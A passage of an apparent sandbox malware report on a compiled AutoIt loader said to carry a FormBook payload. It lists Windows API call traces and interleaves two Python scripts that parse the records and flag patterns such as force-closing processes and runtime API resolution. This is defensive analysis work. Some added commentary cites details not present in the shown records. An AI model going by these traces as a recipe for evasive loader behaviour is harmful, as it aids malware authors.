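    "• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB64",
    "• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB6E",
    "• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB75",
]


def parse_call(line):
    """Parse one API line into a dict, or return None if it is not one.

    Unknown arguments ('?') become None, 8-digit hex arguments become ints,
    anything else (e.g. 'CorExitProcess', 'mscoree.dll') is kept as a string.
    """
    text = line.strip().lstrip("•-* ").strip()
    m = CALL_RE.match(text)
    if not m:
        return None
    args = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            if a == "?":
                args.append(None)
            elif re.fullmatch(r"[0-9A-F]{8}", a):
                args.append(int(a, 16))
            else:
                args.append(a)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def parse_block(lines):
    """Parse every API line of one function block, skipping non-API lines."""
    return [c for c in (parse_call(l) for l in lines) if c]


def annotate(call):
    """Return the human-readable notes a triager would add to this call."""
    notes = []
    api, args = call["api"], call["args"]
    if api.startswith(("PostMessage", "SendMessage")) and len(args) > 1 and args[1] == WM_CLOSE:
        notes.append("msg=WM_CLOSE")
    if api == "SendMessageTimeoutW" and len(args) > 5:
        if args[4] is not None and args[4] & SMTO_ABORTIFHUNG:
            notes.append("SMTO_ABORTIFHUNG")
        if args[5] is not None:
            notes.append(f"timeout={args[5]}ms")
    if api == "OpenProcess" and args and args[0] == PROCESS_ALL_ACCESS:
        notes.append("PROCESS_ALL_ACCESS")
    return notes


def find_force_close(calls):
    """True if the block sends WM_CLOSE and then, in order, resolves the
    owning process, opens it and terminates it (close-then-kill)."""
    sent_close = any("msg=WM_CLOSE" in annotate(c) for c in calls)
    wanted = ["GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"]
    idx = 0
    for c in calls:
        if idx < len(wanted) and c["api"] == wanted[idx]:
            idx += 1
    return bool(sent_close and idx == len(wanted))


if __name__ == "__main__":
    calls = parse_block(SAMPLE)
    for c in calls:
        print(f"{c['ref']:08X} {c['api']}.{c['module']} {annotate(c)}")
    print("close-then-kill pattern:", find_force_close(calls))
```

Run it over any "APIs" block of this listing by pasting the bullet lines into SAMPLE; the parser ignores the "Memory Dump Source" and hash lines, so whole blocks can be fed in unchanged.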
                                                                      APIs
                                                                      • GetClientRect.USER32(?), ref: 00A17452
                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A17469
                                                                      • GetWindowDC.USER32(?), ref: 00A17475
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00A17484
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00A17496
                                                                      • GetSysColor.USER32(00000005), ref: 00A174B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                      • String ID:
                                                                      • API String ID: 272304278-0
                                                                      • Opcode ID: 88d438d942bfb536f5660e2efe6d53e33cc03982ac960911670bd27e6aa7e2fa
                                                                      • Instruction ID: 7115640b6d2f84ab27346bcfbf18caabb29bc0932462ea9e7235f5bdb2c8f066
                                                                      • Opcode Fuzzy Hash: 88d438d942bfb536f5660e2efe6d53e33cc03982ac960911670bd27e6aa7e2fa
                                                                      • Instruction Fuzzy Hash: 4A018631440305EFEB519FA4DC08BEE7BB5FB04322F201160F916A31A0CB311E82EB10
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A2187F
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00A2188B
                                                                      • CloseHandle.KERNEL32(?), ref: 00A21894
                                                                      • CloseHandle.KERNEL32(?), ref: 00A2189C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A218A5
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A218AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: d5b33c0a827b1587be1838579e54fcec40ef31991e066a678d16e93f36798c28
                                                                      • Instruction ID: 37e6e74aef339838fa05d0353f23f01b70714713bef854e9e944427e19cdb884
                                                                      • Opcode Fuzzy Hash: d5b33c0a827b1587be1838579e54fcec40ef31991e066a678d16e93f36798c28
                                                                      • Instruction Fuzzy Hash: D4E0C236004705BFDA019BE1ED0C90ABB69FB49B32B108220F22685478CB32A4A2DB50
                                                                      APIs
                                                                        • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A2C6EE
                                                                      • _wcslen.LIBCMT ref: 00A2C735
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A2C79C
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A2C7CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                      • String ID: 0
                                                                      • API String ID: 1227352736-4108050209
                                                                      • Opcode ID: 4ff9fdd7267485174c9f0151eab6aefcdaaf09357d91b35e717e4de2cba40d39
                                                                      • Instruction ID: 83cbebaf6d02694e6fbd24a26ef22d97a9696ca499745d2122e0dc0c476873a7
                                                                      • Opcode Fuzzy Hash: 4ff9fdd7267485174c9f0151eab6aefcdaaf09357d91b35e717e4de2cba40d39
                                                                      • Instruction Fuzzy Hash: 2551CC716043619BD7159F2CE885B6EB7E8AF89320F040A3DF995E32A1DB64DD04CB92
                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00A4AEA3
                                                                        • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
                                                                      • GetProcessId.KERNEL32(00000000), ref: 00A4AF38
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4AF67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                      • String ID: <$@
                                                                      • API String ID: 146682121-1426351568
                                                                      • Opcode ID: 17e76f7470b1ed47b03ef46f56119b9c06d11702b04fd10a36403351fd51dcb2
                                                                      • Instruction ID: 1bc0dcfaa4502aaf5a3b4070beec89cd7b0182bf65523250eb6a487282a21942
                                                                      • Opcode Fuzzy Hash: 17e76f7470b1ed47b03ef46f56119b9c06d11702b04fd10a36403351fd51dcb2
                                                                      • Instruction Fuzzy Hash: BE714675A00619DFCB14DF94C485A9EBBF0BF88314F04849DE81AAB362CB74ED45CB92
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A27206
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A2723C
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A2724D
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A272CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: a791f42b6e3e5113fe61bd8c3da1662ce6975c09e132d79e434c7ff4c97713a1
                                                                      • Instruction ID: 25549621343fdb8f2cd52e5d6e0e893a8b617803f395b12e98d3728b2cb6d51d
                                                                      • Opcode Fuzzy Hash: a791f42b6e3e5113fe61bd8c3da1662ce6975c09e132d79e434c7ff4c97713a1
                                                                      • Instruction Fuzzy Hash: BE413971A04314EFDB15CF98D884A9E7BB9EF44710F1580A9FD059F20AD7B1DA45CBA0
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A21E66
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A21E79
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A21EA9
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2081771294-1403004172
                                                                      • Opcode ID: f587b4a7ffc041b05759c3c7aa922bb79fe7e090c4a79bccf956c382109df1a2
                                                                      • Instruction ID: 6fee2507ee273df6297466753b304b081362fb42763243c09be16c2111b9140e
                                                                      • Opcode Fuzzy Hash: f587b4a7ffc041b05759c3c7aa922bb79fe7e090c4a79bccf956c382109df1a2
                                                                      • Instruction Fuzzy Hash: 7D212C71D00104BFDB14ABA8EC59DFF77B8EF95360B104539F825A71D1DB384D0A8620
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A52F8D
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00A52F94
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A52FA9
                                                                      • DestroyWindow.USER32(?), ref: 00A52FB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 3529120543-1011021900
                                                                      • Opcode ID: 2ed5cf98b2bbdc8b0f79f20dfc1bab9fc7ddbf6bab257920c2a9356de6654066
                                                                      • Instruction ID: 603d5df475bf422b397e9d6652faa8aaa767987c139528117e268cffd5fdf77f
                                                                      • Opcode Fuzzy Hash: 2ed5cf98b2bbdc8b0f79f20dfc1bab9fc7ddbf6bab257920c2a9356de6654066
                                                                      • Instruction Fuzzy Hash: 2C21AE71204205AFEB109FA4EC80FBB37B9FB5A366F104618FD50E6190D771DC6A9B60
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009E4D1E,009F28E9,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002), ref: 009E4D8D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009E4DA0
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,009E4D1E,009F28E9,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002,00000000), ref: 009E4DC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 8afd0a15fe65fb02fb51ef78c6043fa0f4ecdcff21aa50a6405950ed9fd0d57d
                                                                      • Instruction ID: b249fee6ee9a261e30979b8f8c909d9b88fd5e50170881f56f1aaa12bb31143a
                                                                      • Opcode Fuzzy Hash: 8afd0a15fe65fb02fb51ef78c6043fa0f4ecdcff21aa50a6405950ed9fd0d57d
                                                                      • Instruction Fuzzy Hash: 1EF04F34A40708BFDB119FA1DC49BAEBBB9FF44762F0001A4F805A62A0CB746D81CB90
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E9C
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009C4EAE
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-3689287502
                                                                      • Opcode ID: 1cdd6c375238f13f380b5917ff2f9411cc335422b4969c16886f32fdeb9b0ff7
                                                                      • Instruction ID: 4adc49a2f707233b92819a73f93b6021133b8cbf9a0e28af82b847aebb8a0077
                                                                      • Opcode Fuzzy Hash: 1cdd6c375238f13f380b5917ff2f9411cc335422b4969c16886f32fdeb9b0ff7
                                                                      • Instruction Fuzzy Hash: 8EE08636F01B226FD22157656C28F5B6658BF81F737060219FC00E3144DB64CD0281A1
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E62
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009C4E74
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E87
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-1355242751
                                                                      • Opcode ID: d8518456d8545561fb208ff2632548a9106c015feeb802aa27f425c28517b7c4
                                                                      • Instruction ID: 8ed20ec35c1e22c3346b3336741f929ada43d57f3a52ab8c0300a300033b4680
                                                                      • Opcode Fuzzy Hash: d8518456d8545561fb208ff2632548a9106c015feeb802aa27f425c28517b7c4
                                                                      • Instruction Fuzzy Hash: 0BD01236A02B216FDA225B697C28E8B6A1CBF85F723060619BD05A3119CF64CD02C5D2
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00A4A427
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A4A435
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A4A468
                                                                      • CloseHandle.KERNEL32(?), ref: 00A4A63D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 8390071b8fc935f1c37cf195995f88efe1749e20aa8123c1d4fc16801245b558
                                                                      • Instruction ID: 601c4978ad8947a141f3c6086b75252414ed9ae430596ee286501cad028734c5
                                                                      • Opcode Fuzzy Hash: 8390071b8fc935f1c37cf195995f88efe1749e20aa8123c1d4fc16801245b558
                                                                      • Instruction Fuzzy Hash: 53A1AFB5644300AFD720DF24C886F2ABBE5AFD4714F14881DF59A9B392D7B0ED418B82
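The two LoadLibraryA / GetProcAddress / FreeLibrary records above resolve Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection at run time instead of importing them, and the record just above opens a process with access mask 0x410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ) before calling GetProcessIoCounters. The ">>>AUTOIT NO CMDEXECUTE<<<" argument visible in those call stacks is an AutoIt runtime string, consistent with the report's "Binary is likely a compiled AutoIt script file" signature, so these functions sit in the AutoIt interpreter that wraps the sample; indicators derived from them characterize the loader, not the injected FormBook payload. The script below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses records in this APIs / Memory Dump Source / Similarity layout into structured form, strips the "Download File" button label that extraction fused onto the Associated lines, decodes the OpenProcess access mask, and tags each record with coarse indicators. The sample input is constructed from lines on this page (two records, with an _free / RtlFreeHeap subcall line borrowed from the GetTimeZoneInformation record so the subcall format is exercised); the indicator names are labels chosen for this example, not Joe Sandbox signature names.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records and tag them with coarse indicators.
Added example; not code from the Joe Sandbox report, Joe Sandbox, or the AutoIt runtime."""
import re
from dataclasses import dataclass, field

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE,
# optional (args), then "ref: <hex address>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Win32 process access rights (subset) used to decode OpenProcess's first argument.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

@dataclass
class Record:
    apis: list = field(default_factory=list)      # direct calls and subcalls, report order
    fields: dict = field(default_factory=dict)    # "Opcode ID", "String ID", "API String ID", ...
    associated: list = field(default_factory=list)

def parse_records(text):
    """Split report text into Record objects; each record starts at an 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None or not line or line in HEADERS:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            cur.apis.append({"name": m.group("name"), "module": m.group("module"),
                             "args": args.split(",") if args is not None else [],
                             "ref": m.group("ref"), "subcall": m.group("sub")})
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.group("key"), m.group("val")
            if key == "Associated":
                # The report UI's "Download File" button label is fused onto the dump name.
                cur.associated.append(val.removesuffix("Download File"))
            else:
                cur.fields[key] = val
    return records

def decode_access(mask):
    """Name the process access rights set in an OpenProcess desired-access mask."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]

def indicators(rec):
    """Coarse behavioural tags for one record (labels are this example's own)."""
    direct = [a for a in rec.apis if a["subcall"] is None]
    names = {a["name"] for a in direct}
    hits = []
    if names & {"LoadLibraryA", "LoadLibraryW"} and "GetProcAddress" in names:
        hits.append("dynamic-import")
    wow64 = [s for s in rec.fields.get("String ID", "").split("$") if s.startswith("Wow64")]
    if wow64:
        hits.append("wow64-fs-redirection:" + ",".join(wow64))
    for a in direct:
        if a["name"] == "OpenProcess" and a["args"] and a["args"][0] != "?":
            hits.append("open-process:" + "|".join(decode_access(int(a["args"][0], 16))))
    if "GetProcessIoCounters" in names:
        hits.append("process-io-counters")
    return hits

# Constructed sample: two records assembled from lines of this report page.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009C4EAE
• FreeLibrary.KERNEL32(00000000,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Opcode ID: 1cdd6c375238f13f380b5917ff2f9411cc335422b4969c16886f32fdeb9b0ff7
APIs
• GetCurrentProcessId.KERNEL32 ref: 00A4A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A4A435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A4A468
• CloseHandle.KERNEL32(?), ref: 00A4A63D
• _free.LIBCMT ref: 009FBB7F
  • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1), ref: 009F29DE
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("Opcode ID", "?")[:16], [a["name"] for a in rec.apis], indicators(rec))
```

Run it over a saved copy of the report and the "API String ID" field gives a stable key for deduplicating functions across samples built with the same AutoIt version, which is the quickest way to separate runtime helpers from code specific to this build.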
                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A63700), ref: 009FBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A9121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009FBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A91270,000000FF,?,0000003F,00000000,?), ref: 009FBC36
                                                                      • _free.LIBCMT ref: 009FBB7F
